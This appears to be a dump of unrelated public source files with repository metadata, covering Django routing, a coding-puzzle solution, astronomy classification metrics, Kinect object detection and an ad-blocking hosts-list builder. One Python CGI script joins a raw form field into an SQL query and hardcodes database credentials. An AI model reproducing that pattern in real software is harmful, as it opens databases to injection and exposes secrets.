b64b28957428cae3691439bd6521fdf697ec02a9 | b10808f1407517fac1acd224bd3909f7110134ed | /deployment/cv/urls.py | b64c54686d00e6366449c770f4b279bf931f095a | [] | no_license | Mohit0928/Computer-Vision | af468054c4890e997f442b15c1e931da96b00cf2 | ea8e2b435df7a0f9b4a60c6dfb9ed35378c3bea1 | refs/heads/master | 2023-07-11T16:21:18.026405 | 2021-08-06T03:40:29 | 2021-08-06T03:40:29 | 393,006,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,172 | py | """deployment URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from . import views
urlpatterns = [
path('', views.base, name='base'),
path('classification', views.classification, name='classification'),
path('semantic_segmentation', views.semantic_segmentation, name='semantic_segmentation'),
path('panoptic_segmentation', views.panoptic_segmentation, name='panoptic_segmentation'),
path('object_detection', views.object_detection, name='object_detection'),
path('license_plate',views.license_plate,name='license_plate'),
] | [
"mohityadav0928@gmail.com"
] | mohityadav0928@gmail.com |
66d3b0de7469b1683d10d96d96d69ab4acea07d3 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Hackerrank/Hackkerrank-Designer PDF Viewer.py | 1c85d2e8aa255eccd12daed1cbc4d104ce1bd3ca | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the designerPdfViewer function below.
def designerPdfViewer(h, word):
# word = nhan
# arr = [1,3,2,1]
arr=[]
for letter in word:
index = ord(letter) - 97
arr.append(h[index])
return max(arr) * len(arr)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
h = list(map(int, input().rstrip().split()))
word = input()
result = designerPdfViewer(h, word)
fptr.write(str(result) + '\n')
fptr.close() | [
"ntle1@pipeline.sbcc.edu"
] | ntle1@pipeline.sbcc.edu |
15218a1f163359e8df4dae8392b7dc8ae2df3796 | abbef3bb190ef3c4e93a534e20876fdcf96a74e6 | /src/validacao.py | e84b8c7e9619f09a897efb0a4290eee3eff842d3 | [
"MIT"
] | permissive | J040/look-up-to-the-sky-and-see | 845748a4c9240cc8d95df1cc175acdc2ab2ae59a | 3267585f36ee5e4750505c4c1de110c61a660e1d | refs/heads/master | 2022-09-11T23:01:08.997127 | 2022-09-07T21:13:09 | 2022-09-07T21:13:09 | 204,081,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,413 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 18 10:18:52 2019
@author: João Victor Ribeiro de Jesus
"""
from __future__ import print_function
# GALAXIAS COMO SENDO REFERENTE À CLASSIFICACAO '0'
def compararClassificacao1(objetos):
acertos = 0
erros = 0
VP = 0
VN = 0
FP = 0
FN = 0
estrelasExistentes = 0
galaxiasExistentes = 0
totalVarianciaGalaxias = 0
totalVarianciaEstrelas = 0
for objeto in objetos:
if 1 == objeto["classificacaoGerada"]:
galaxiasExistentes += 1
totalVarianciaGalaxias += objeto["variancia"]
if 0 == objeto["classificacaoGerada"]:
estrelasExistentes += 1
totalVarianciaEstrelas += objeto["variancia"]
if 'GALAXY' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
acertos += 1
VP += 1
elif 'STAR' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
erros += 1
FP += 1
elif 'GALAXY' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
erros += 1
FN += 1
elif 'STAR' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
acertos += 1
VN += 1
elif 'DESCONHECIDO' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
erros += 1
FP += 1
mediaG = totalVarianciaGalaxias / galaxiasExistentes
#print('Galaxias acertadas:', acertosGalaxias, 'Galaxias erradas:', errosGalaxias, 'Estrelas acertadas:', acertosEstrelas, 'Estrelas erradas:', errosEstrelas)
return acertos, erros, estrelasExistentes, galaxiasExistentes, mediaG, VP, VN, FP, FN
# GALAXIAS COMO SENDO REFERENTE À CLASSIFICACAO '0'
def compararClassificacao0(objetos):
acertos = 0
erros = 0
VP = 0
VN = 0
FP = 0
FN = 0
estrelasExistentes = 0
galaxiasExistentes = 0
totalVarianciaGalaxias = 0
totalVarianciaEstrelas = 0
for objeto in objetos:
if 0 == objeto["classificacaoGerada"]:
galaxiasExistentes += 1
totalVarianciaGalaxias += objeto["variancia"]
if 1 == objeto["classificacaoGerada"]:
estrelasExistentes += 1
totalVarianciaEstrelas += objeto["variancia"]
if 'GALAXY' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
acertos += 1
VP += 1
elif 'STAR' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
erros += 1
FP += 1
elif 'GALAXY' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
erros += 1
FN += 1
elif 'STAR' in objeto["classificacao"] and 1 == objeto["classificacaoGerada"]:
acertos += 1
VN += 1
elif 'DESCONHECIDO' in objeto["classificacao"] and 0 == objeto["classificacaoGerada"]:
erros += 1
FP += 1
mediaG = totalVarianciaGalaxias / galaxiasExistentes
#print('Galaxias acertadas:', acertosGalaxias, 'Galaxias erradas:', errosGalaxias, 'Estrelas acertadas:', acertosEstrelas, 'Estrelas erradas:', errosEstrelas)
return acertos, erros, estrelasExistentes, galaxiasExistentes, mediaG, VP, VN, FP, FN | [
"umvelhobarbudo@gmail.com"
] | umvelhobarbudo@gmail.com |
07c43020b2c4de524585a2995ba0ad589f42ef70 | 8fd92c0a65c9b3e3912b6e8ef043656ee225880a | /datetime_examples.py | e6023b44234c3f6cfb1b822db2448812f1685d86 | [] | no_license | waiteb15/py3forsci3day | 9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4 | fc664042618f0910d40e85677a2438eef5cce2b7 | refs/heads/master | 2020-04-25T11:24:18.697218 | 2019-02-28T23:40:52 | 2019-02-28T23:40:52 | 172,743,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | #!/usr/bin/env python
from datetime import date, datetime, timedelta, time
today = date.today()
print(today, today.year)
james_bd = date(2014, 8, 1)
print(james_bd)
delta = today - james_bd
print(delta)
years = int(delta.days // 365.25)
print(f"James is {years} years old")
event = datetime(2019, 5, 11, 13, 22, 47)
print(event)
ten_years = timedelta(10 * 365.25)
print(james_bd + ten_years)
import time
start = time.time()
# do something
end = time.time()
seconds = end - start
print("Wait for it....", end="", flush=True)
time.sleep(0)
print("done")
from dateutil.parser import parse
import dateutil.utils
my_dates = [
"Apr 1, 2019",
"2019-04-01",
"4/1/19",
"4-1-2019",
"April 1 2019",
"Feb 31, 2032",
]
for d in my_dates:
try:
print(parse(d))
except Exception as err:
print(err)
d = dateutil.utils.datetime(2019, 4, 1, 11, 11, 11, 0)
print(d, type(d))
| [
"waiteb15@gmail.com"
] | waiteb15@gmail.com |
441c5e0fd346e1a186534989313ef8fd0f7c6452 | 85aecf00924db457d3874b314ab8b2962a75e788 | /depth_analyze.py | ef0368d352b20283331e797b110ca6886d1edd6a | [] | no_license | JakubKedzierski/detection_test_app | 57a15b58e090a821d9bc540fa5b4979397a62ced | 640823edf2397c9c0897ebfbfd54ad5936296478 | refs/heads/main | 2023-09-06T01:55:54.556167 | 2021-11-06T19:36:33 | 2021-11-06T19:36:33 | 425,331,145 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,025 | py | from enum import Enum, auto
import numpy as np
class DepthAnalyze:
median = auto()
mean = auto()
def analyzeDepth(image_depth, output, analyze_pipeline=DepthAnalyze.median):
image_depth_orginal = image_depth.as_depth_frame()
bbox_to_remove = []
for bbox in output.bboxes:
point_LD = (bbox[1], bbox[0]) # left down
point_RU = (bbox[3], bbox[2]) # right upper
distance = 0
clipped_size = 20
width = bbox[3] - bbox[1] - clipped_size
height = bbox[2] - bbox[0] - clipped_size
if width <= 0:
width = 1
if height <= 0:
height = 1
depth_array = []
it_x = -1
it_y = -1
for i in range(int(bbox[1]) + int(clipped_size / 2), int(bbox[3]) - int(clipped_size / 2)):
it_x = it_x + 1
it_y = -1
for j in range(int(bbox[0]) + int(clipped_size / 2), int(bbox[2]) - int(clipped_size / 2)):
it_y = it_y + 1
depth = image_depth_orginal.get_distance(i, j)
if depth != 0:
depth_array.append(depth)
distance = distance + depth
area = (bbox[3] - bbox[1]) * (bbox[2] - bbox[0])
mean_distance = distance / area
median_distance = np.median(np.array(depth_array))
distance = 0
if analyze_pipeline is DepthAnalyze.mean:
distance = mean_distance
else:
distance = median_distance
max_distance = 0.55
if distance > max_distance:
bbox_to_remove.append(bbox)
for box in bbox_to_remove:
result = np.where((output.bboxes == box).all(axis=1))
output.bboxes = np.delete(output.bboxes, result, 0)
output.class_ids = np.delete(output.class_ids, result)
if len(output.masks) > 0:
output.masks = np.delete(output.masks, result, 2)
if len(output.scores) > 0:
output.scores = np.delete(output.scores, result)
return output
| [
"248915@student.pwr.edu.pl"
] | 248915@student.pwr.edu.pl |
f3bce732943723b4735221094555753d6f4c37c7 | d2f7b20c023018e7f0a47558c39f3dd25099cad9 | /ui_service/setup.py | 279e826062efe2b304acf3f3b66acd0b1b5b6d54 | [] | no_license | bhavenp/docker_sentiment_analysis | 7401f36c708966420465f9a898a1f1b80160702e | 28cee06e1352866fa72b8bdbbd09a42f3a010add | refs/heads/master | 2022-12-04T06:30:48.661067 | 2020-08-19T15:28:08 | 2020-08-19T15:28:08 | 285,861,054 | 0 | 1 | null | 2020-08-17T21:59:26 | 2020-08-07T15:22:30 | CSS | UTF-8 | Python | false | false | 754 | py | from pathlib import Path
from setuptools import setup, find_packages
ROOT_DIR = Path(__file__).resolve().parent
with open(ROOT_DIR / "README.md", "r") as f:
long_description = f.read().strip()
setup(
name="sentiment_analysis_ui_service",
version=0.1,
description="Display the UI using a Flask application. UI will interact with the ML model.",
long_description=long_description,
author="Bhaven Patel",
python_requires= ">=3.6.0",
packages=find_packages(),
include_package_data=True,
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6"
],
) | [
"3346052+bhavenp@users.noreply.github.com"
] | 3346052+bhavenp@users.noreply.github.com |
f8aaf5b7ebcb85dc4d6f259686f7bfc3cb2be03b | 8791c290c3c6e6ad22bf3635b3b512badda40354 | /main.py | feb33b0ee7aca1845c769a70d65614b5447ef09e | [] | no_license | wndenis/gSorter | 99dfde299b9722958dd9a58867c1f468c0e6b1c1 | 18c526825724002eff2c7951b261e6730909332d | refs/heads/master | 2020-05-01T01:50:02.813579 | 2020-04-19T01:10:23 | 2020-04-19T01:10:23 | 177,203,979 | 1 | 0 | null | 2019-05-02T08:03:39 | 2019-03-22T20:18:14 | null | UTF-8 | Python | false | false | 2,791 | py | # -*- coding: utf-8 -*-
from pykinect2 import PyKinectV2
from pykinect2 import PyKinectRuntime
import numpy as np
import cv2
from imageai.Detection import ObjectDetection
import os
if __name__ == "__main__":
print("Start.")
execution_path = os.getcwd()
detector = ObjectDetection()
detector.setModelTypeAsYOLOv3()
detector.setModelPath(os.path.join(execution_path, "yolo.h5"))
# detector.setModelTypeAsTinyYOLOv3()
# detector.setModelPath(os.path.join(execution_path, "yolo-tiny.h5"))
detector.loadModel()
custom_objects = detector.CustomObjects(person=True, umbrella=True, car=True, cup=True, fork=True, knife=True, bottle=True, cell_phone=True)
kinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color)
shape = (424, 512)
midpoint = (kinect.color_frame_desc.Width // 2, kinect.color_frame_desc.Height // 2)
cv2.namedWindow("output", cv2.WINDOW_NORMAL)
while True:
frame = kinect.get_last_color_frame()
frame = frame.reshape((1080, 1920, -1)).astype(np.uint8)
# frame = np.reshape(frame, (1080, 1920, -1))#.astype(np.uint8)
frame = cv2.resize(frame, (0, 0), fx=0.3, fy=0.3, interpolation=cv2.INTER_CUBIC)
# frame = cv2.resize(frame, dsize=(1920//4, 1080//4), interpolation=cv2.INTER_CUBIC)
#gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if True:
detections = detector.detectCustomObjectsFromImage(input_image=frame,
input_type="array",
output_type="array",
minimum_percentage_probability=70,
custom_objects=custom_objects)
for box in detections[1]:
b = box['box_points']
cv2.rectangle(frame, b,
(0, 0, 250), 2)
label = "{} {:.2f}".format(box['name'], box['percentage_probability'])
cv2.putText(frame, label, (b[0], b[1] - 10), cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 255), 2)
# print(box)
# print("\n\n\n\n\n\n\n")
# frame = np.reshape(frame, shape)
# frame = np.uint8(frame.clip(1, 4000) / 16.)?????????????????
# frame = cv2.bilateralFilter(frame, 9, 150, 75)
# cv2.rectangle(frame, (midpoint[0]-15, midpoint[1]-15), (midpoint[0]+15, midpoint[1]+15), (32000, 32000, 32000), 2)
# color = frame[midpoint]
#frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)
cv2.imshow("output", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
| [
"winda.wzse@gmail.com"
] | winda.wzse@gmail.com |
1bca0d375f7e15a441d59fa7d53ab93591fafacd | a2676d947a1117f55aa56bf204af91e2fc4e14c1 | /sw/interface/bsvparse.py | dabfd331cb972e02768b1b1b76b43bfda412ea13 | [] | no_license | jwcxz/bt | 1c21a56e0c9ffb8f500122d5f8f860f488f65df7 | 7201f061a3ea2b5d1f8d6f1524c6418feb67ea29 | refs/heads/master | 2016-09-06T02:19:13.690233 | 2013-05-15T20:14:17 | 2013-05-15T20:14:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | import re
re_met = re.compile('.*typedef\s+(?P<num>\d+)\s+NumMetronomes;.*');
re_base = re.compile('.*Real\s+min_tempo\s+=\s+(?P<base>\d+)\s*;.*');
def get_num_base(fname):
f = open(fname, 'r');
num = None;
base = None;
for line in f:
if re_met.search(line):
num = int(re_met.search(line).groupdict()['num']);
elif re_base.search(line):
base = int(re_base.search(line).groupdict()['base']);
if num != None and base != None:
break;
f.close();
return (num, base);
| [
"jwc@jwcxz.com"
] | jwc@jwcxz.com |
ec1a3d7966710dda0715824013d254e4aed4ffdc | ec61289c9345fdc4c7f4c79b416961618b70f30c | /scripts/stevenblack.py | a659c53ea2b804f429d2f5406be20d6a97438fa0 | [] | no_license | icedevil2001/pihole_blocklist | fb26a0578bdb3f2e642e2a8f4489de05e2a58dce | 10b900c713a1f8b79d88995e96694dd0f19da929 | refs/heads/master | 2023-06-22T18:49:24.086897 | 2023-06-12T05:05:05 | 2023-06-12T05:05:05 | 269,239,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,395 | py | import requests
import re
## See: https://github.com/StevenBlack/hosts
def process_host_file(text):
for line in text.strip().split('\n'):
if line.startswith('#'):
continue
line = line.strip().replace('0.0.0.0 ','')
if line:
yield line
def process_url(url):
# url = 'https://raw.githubusercontent.com/StevenBlack/hosts/master/data/StevenBlack/hosts'
req = requests.get(url)
if req.status_code == requests.codes.ok:
for line in process_host_file(req.text):
yield line
# content = base64.decodestring(req['content'])
URLS = ['https://raw.githubusercontent.com/StevenBlack/hosts/master/data/StevenBlack/hosts',
"https://raw.githubusercontent.com/AdAway/adaway.github.io/master/hosts.txt",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/add.2o7Net/hosts",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/add.Dead/hosts",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/add.Risk/hosts",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/add.Spam/hosts",
"https://raw.githubusercontent.com/mitchellkrogza/Badd-Boyz-Hosts/master/hosts",
"https://raw.githubusercontent.com/bigdargon/hostsVN/master/option/hosts-VN",
"https://raw.githubusercontent.com/PolishFiltersTeam/KADhosts/master/KADhosts.txt",
"https://raw.githubusercontent.com/MetaMask/eth-phishing-detect/master/src/hosts.txt",
"https://raw.githubusercontent.com/jamiemansfield/minecraft-hosts/master/lists/tracking.txt",
"https://winhelp2002.mvps.org/hosts.txt",
"https://raw.githubusercontent.com/shreyasminocha/shady-hosts/main/hosts",
"https://someonewhocares.org/hosts/zero/hosts",
"https://raw.githubusercontent.com/tiuxo/hosts/master/ads",
"https://raw.githubusercontent.com/FadeMind/hosts.extras/master/UncheckyAds/hosts",
"https://urlhaus.abuse.ch/downloads/hostfile/",
"https://pgl.yoyo.org/adservers/serverlist.php?hostformat=hosts&mimetype=plaintext&useip=0.0.0.0"]
filename = "/Users/icedevil2001/Dropbox/Documents/Documents-Priyesh_MacBookPro13/git/pihole_blocklist/blocklist/StevenBlack.txt"
with open(filename, 'w') as fh:
for url in URLS:
for line in process_url(url):
fh.write(line + "\n") | [
"priyesh1983@gmail.com"
] | priyesh1983@gmail.com |
9c37abc4fa6449ae6902e9b29f313a0b8cc9220d | 515d347ea81092512a5f5e945e152c0d27f928a8 | /utilities/teststatus.py | 0cc74efd7f8318891fd6e81272b9e4c0c1e501d2 | [] | no_license | Mrinalini-18/Sparkstone-QA | d19325b477ebd71f7e39411319c5b96b1d251ecf | f9b0179851339cb885425d35ce52b71037a135df | refs/heads/master | 2023-01-09T10:34:20.163099 | 2020-11-09T13:40:07 | 2020-11-09T13:40:07 | 311,349,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | import utilities.custom_logger as cl
import logging
from base.selenium_driver import SeleniumDriver
from traceback import print_stack
class TestStatus(SeleniumDriver):
log = cl.customLogger(logging.INFO)
def __init__(self, driver):
"""
Inits CheckPoint class
"""
super(TestStatus, self).__init__(driver)
self.resultList = []
def setResult(self, result, resultMessage):
try:
if result is not None:
if result:
self.resultList.append("PASS")
self.log.info("### VERIFICATION SUCCESSFUL :: + " + resultMessage)
self.screenShot(resultMessage)
else:
self.resultList.append("FAIL")
self.log.error("### VERIFICATION FAILED :: + " + resultMessage)
self.screenShot(resultMessage)
self.driver.get_log('driver')
else:
self.resultList.append("FAIL")
self.log.error("### VERIFICATION FAILED :: + " + resultMessage)
self.screenShot(resultMessage)
except:
self.resultList.append("FAIL")
self.log.error("### Exception Occurred !!!")
self.screenShot(resultMessage)
self.driver.get_log('driver')
print_stack()
def mark(self, result, resultMessage):
"""
Mark the result of the verification point in a test case
"""
self.setResult(result, resultMessage)
def markFinal(self, testName, result, resultMessage):
"""
Mark the final result of the verification point in a test case
This needs to be called at least once in a test case
This should be final test status of the test case
"""
self.setResult(result, resultMessage)
if "FAIL" in self.resultList:
self.log.error(testName + " ### TEST FAILED")
self.resultList.clear()
self.driver.get_log('driver')
assert True == False
else:
self.log.info(testName + " ### TEST SUCCESSFUL")
self.resultList.clear()
assert True == True | [
"mrinalini.kohli@isb.com.mt"
] | mrinalini.kohli@isb.com.mt |
10ebe15e221446bab08a4d897fc101f9d8a8b95f | a5aabe2e4057d78e687a57a6b560516a7cdb5836 | /unsserv/common/rpc/protocol.py | 688b39a308b01db7dacf58311fc8aea432c875c7 | [
"MIT"
] | permissive | aratz-lasa/py-unsserv | 0ffc09ddab65a11ce917d0faa8b1b5dff091e563 | 6f332385e55d05953186b9a8b7848bca4b878e18 | refs/heads/master | 2022-12-14T21:10:12.397834 | 2020-05-03T11:29:49 | 2020-05-03T11:29:49 | 228,329,158 | 5 | 0 | MIT | 2022-12-08T07:00:55 | 2019-12-16T07:35:20 | Python | UTF-8 | Python | false | false | 2,808 | py | import asyncio
from abc import ABC, abstractmethod
from dataclasses import is_dataclass, asdict
from enum import IntEnum
from typing import Any, Tuple, Sequence, Dict, Callable
from unsserv.common.rpc.rpc import RPCRegister, RPC
from unsserv.common.rpc.structs import Message
from unsserv.common.structs import Node
Command = IntEnum
Data = Any
Handler = Callable[..., Any]
class ITranscoder(ABC):
my_node: Node
service_id: str
def __init__(self, my_node: Node, service_id: str):
self.my_node = my_node
self.service_id = service_id
@abstractmethod
def encode(self, command: Command, *data: Data) -> Message:
pass
@abstractmethod
def decode(self, message: Message) -> Tuple[Command, Sequence[Data]]:
pass
class AProtocol:
my_node: Node
service_id: str
_rpc: RPC
_transcoder: ITranscoder
_handlers: Dict[Command, Handler]
_running: bool
def __init__(self, my_node: Node):
self.my_node = my_node
self._rpc = RPCRegister.get_rpc(my_node)
self._handlers = {}
self._running = False
async def start(self, service_id: str):
if self._running:
raise RuntimeError("Protocol already running")
self.service_id = service_id
self._transcoder = self._get_new_transcoder()
await self._rpc.register_service(service_id, self.handle_rpc)
self._running = True
async def stop(self):
if self._running:
await self._rpc.unregister_service(self.service_id)
self._running = False
async def handle_rpc(self, message: Message):
command, data = self._transcoder.decode(message)
handler = self._handlers[command]
if asyncio.iscoroutinefunction(handler):
response = await handler(message.node, *data)
return self._encode_response(response)
else:
response = handler(message.node, *data)
return self._encode_response(response)
def _encode_response(self, response: Any) -> Any:
if isinstance(response, list):
return [self._encode_response(response_item) for response_item in response]
elif isinstance(response, tuple):
return tuple(
self._encode_response(response_item) for response_item in response
)
elif hasattr(response, "encode"):
return response.encode()
elif is_dataclass(response):
return asdict(response)
elif isinstance(response, set):
return list(response)
return response
@abstractmethod
def _get_new_transcoder(self):
"""
Method for initializing ITranscoder, because every Protocol implements
its own.
:return:
"""
pass
| [
"aratzml@opendeusto.es"
] | aratzml@opendeusto.es |
5d41fc1b4840c61f58064418129e660b614f0dc1 | 9afbf45fb02eef2145f7416f05bfbd4c3c0954ec | /getStats.cgi | b7ad6a5f44627b07d12131b221617bbd0d8b7464 | [] | no_license | drl222/drl222.github.io | a3426aa13311d2748c7abb637578c94941bc333c | 23fec94abb998ab1bd534f7d00677bfe16c48ed0 | refs/heads/master | 2023-05-28T13:00:31.519684 | 2023-04-26T01:58:33 | 2023-04-26T01:58:33 | 78,591,091 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,059 | cgi | #!/usr/bin/python
import MySQLdb as mdb
import sys
import cgi
print "Content-type: text\html\n"
print "{"
form = cgi.FieldStorage()
id = "1"
if form.has_key('id'):
id = form['id'].value
try:
con = mdb.connect('localhost', 'dlin', 'dlin2dlin', 'dlin')
sql= "select name, StrCap, MagCap, SklCap, SpdCap, LckCap, DefCap, ResCap from FireEmblem WHERE id=" + id
with con:
cur=con.cursor(mdb.cursors.DictCursor)
cur.execute(sql)
row=cur.fetchone()
print "\"name\":\"" + str(row["name"]) + "\","
print "\"StrCap\":\"" + str(row["StrCap"]) + "\","
print "\"MagCap\":\"" + str(row["MagCap"]) + "\","
print "\"SklCap\":\"" + str(row["SklCap"]) + "\","
print "\"SpdCap\":\"" + str(row["SpdCap"]) + "\","
print "\"LckCap\":\"" + str(row["LckCap"]) + "\","
print "\"DefCap\":\"" + str(row["DefCap"]) + "\","
print "\"ResCap\":\"" + str(row["ResCap"]) + "\""
except mdb.Error, e:
print "Error %d: %s" % (e.args[0],e.args[1])
sys.exit(1)
finally:
if con:
con.close()
print "}"
| [
"drl222@cornell.edu"
] | drl222@cornell.edu |
1fc201d942e296adbcf250786df3f816a80ddebd | e6c65e2e354336a4bea5b6a4ccbccd3682915fe2 | /out-bin/py/google/fhir/seqex/bundle_to_seqex_test.runfiles/com_google_fhir/external/pypi__nose_1_3_7/nose/plugins/testid.py | 3bd121362c001ad4cc26af2877fb5c2b5dc40673 | [
"Apache-2.0"
] | permissive | rasalt/fhir-datalab | c30ab773d84983dd04a37e9d0ddec8bf2824b8a4 | 3e329fc8b4226d3e3a4a7c23c306a86e7a9ea0de | refs/heads/master | 2021-10-09T05:51:04.593416 | 2018-12-21T18:11:03 | 2018-12-22T05:38:32 | 162,744,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/0ddaa3627472ad9d1367a008236ce2f5/external/pypi__nose_1_3_7/nose/plugins/testid.py | [
"ruchika.kharwar@gmail.com"
] | ruchika.kharwar@gmail.com |
4e22230cbb8d92d0afba050b7b30a7dd44fb55e2 | 4f4af7ed2004ed0223a64c5d1ec4c588ba246eaa | /lib/voxelengine/modules/observableCollections.py | 089ae2284ee498bde924f05923aaee840d00e46a | [
"MIT"
] | permissive | bertwesarg/MCG_CRAFT | c88ca9a05bb174cfe74e035b8558d90c673c81db | 95cc51189dcf62d871e726d045f1e7b27d0d6261 | refs/heads/master | 2020-04-27T08:36:15.637677 | 2018-06-14T17:11:16 | 2018-06-14T17:11:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,523 | py | # data that should be representable: containers: dicts, lists; literals: ints, floats, strings
# should be able to subscribe to each of them to be noticed of changes
# should be possible to move stuff (observer move with it) and copy stuff (observers stay where they are)
# when something is changed that implies that all parents have to call their callbacks as well
import collections, itertools
def observable_from(data):
if isinstance(data, Observable):
return data
if isinstance(data, dict):
return ObservableDict(data)
if isinstance(data, list):
return ObservableList(data)
return data
class Observable(object):
def __init__(self):
self.parent = None
self.parent_key = None
self.item_callbacks = collections.defaultdict(set)
self.callbacks = set()
self.sanitizers = dict()
self.data #define self.data in __init__ of subclass! (before calling Observable.__init__)
def __repr__(self):
return repr(self.data)
def __len__(self):
return len(self.data)
def __getitem__(self,key):
return self.data[key]
def get(self, key, default=None):
try:
return self.data[key]
except (KeyError,IndexError):
return default
def _adopted_value(self,value,static_key=None):
value = self.sanitizers.get(static_key,lambda x:x)(value)
value = observable_from(value)
if isinstance(value,Observable):
assert value.parent == None
value.parent = self
value.parent_key = static_key
return value
def __setitem__(self,key,value):
static_key = key if self.static_keys else None
value = self._adopted_value(value,static_key)
self.data[key] = value
self.trigger(static_key)
def register_callback(self,callback,initial_call=True):
self.callbacks.add(callback)
if initial_call:
callback(self)
def unregister_callback(self,callback):
self.callbacks.remove(callback)
def register_item_callback(self,callback,key,initial_call=True):
self.item_callbacks[key].add(callback)
if initial_call:
callback(self[key])
def unregister_item_callback(self,callback,key):
self.item_callbacks[key].remove(callback)
def register_item_sanitizer(self,sanitizer,key,initial_call=True):
self.sanitizers[key] = sanitizer
try:
value = self[key]
except (KeyError, IndexError):
pass
else:
self[key] = sanitizer(value)
def trigger(self,key):
for callback in self.item_callbacks[key]:
callback(self.get(key))
for callback in self.callbacks:
callback(self)
if self.parent:
self.parent.trigger(self.parent_key)
def copy(self):
raise NotImplementedError()
class ObservableDict(Observable):
static_keys = True
def __init__(self,data={}):
self.data = {}
Observable.__init__(self)
self.dict_update(data)
def dict_update(self,data):
for key in data:
self[key] = data[key]
def setdefault(self, key, value):
if key not in self.data:
self[key] = value
return self[key]
class ObservableList(Observable):
static_keys = False
def __init__(self,data=[]):
self.data = []
Observable.__init__(self)
self.extend(data)
def extend(self,values):
self.data.extend(map(self._adopted_value,values))
self.trigger(None)
def append(self,value):
self.data.append(self._adopted_value(value))
self.trigger(None)
def insert(self,index,value):
self.data.insert(index,self._adopted_value(value))
self.trigger(None)
def pop(self,index):
value = self.data.pop(index)
if isinstance(value, Observable):
value.parent = None
self.trigger(None)
return value
def count(self,*args,**kwargs):
return self.data.count(*args,**kwargs)
def index(self,*args,**kwargs):
return self.data.index(*args,**kwargs)
def remove(self, value):
self.pop(self.index(value))
if __name__ == "__main__":
root = observable_from({"a":7,"b":[1,2,3]})
root.setdefault("c",[4])
root["c"].append(2)
root["c"].remove(4)
print type(root["c"]), root["c"]
a = observable_from({1:2})
b = observable_from({1:2})
| [
"joram.brenz@online.de"
] | joram.brenz@online.de |
511ae46f20518493cb4f1b1318575f083d02d117 | f3c9583ea4952cd909cad6b3a2a1b835b305c480 | /myproject/cmsuserput/models.py | 47018820fd7e42715d59f05c81fa49492430f227 | [
"Apache-2.0"
] | permissive | sgomezleon/X-Serv-15.8-CmsUsersPut | 73f72dc3196d0e781eb843dedd8ad06aed207bda | 9063c8e3356cbfd31fb1674264f1b86f4a6fd3ff | refs/heads/master | 2020-12-30T13:39:23.298477 | 2017-05-16T11:45:47 | 2017-05-16T11:45:47 | 91,238,153 | 0 | 0 | null | 2017-05-14T11:14:38 | 2017-05-14T11:14:38 | null | UTF-8 | Python | false | false | 156 | py | from django.db import models
# Create your models here.
class Pages(models.Model):
nombre = models.CharField(max_length=32)
pagina = models.TextField()
| [
"sergom19@hotmail.com"
] | sergom19@hotmail.com |
f317a5007f4c57e06f65dd02a55d4a3a37bee497 | b27543728fe3de41b2ba7666b2ec8ee4c378f6f8 | /blog/tests.py | ca795734c1e8148c513d11793f5d30e3e26c2caa | [] | no_license | jasonantao/image_repository | 2fddd5dbee366dbb8e5204d2a73ee4d1a9c6566a | c8b2426a793d182763f6f8a33ee473a786363879 | refs/heads/master | 2023-07-12T06:27:18.141249 | 2021-08-14T13:43:42 | 2021-08-14T13:43:42 | 365,867,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,256 | py | from django.test import TestCase
from django.utils import timezone
from blog.models import Post
from users.models import User
# Test Case Suite for Posts: image entries
class BlogTestCasesBase(TestCase):
    """Unit tests for the Post model (image entries)."""

    @classmethod
    def setUpTestData(cls):
        # Create one user and one post shared (read-only) by every test below.
        User.objects.create()
        user = User.objects.get(id=1)
        Post.objects.create(title="test_title", content="lake", author=user)

    # str(post) should render the post title
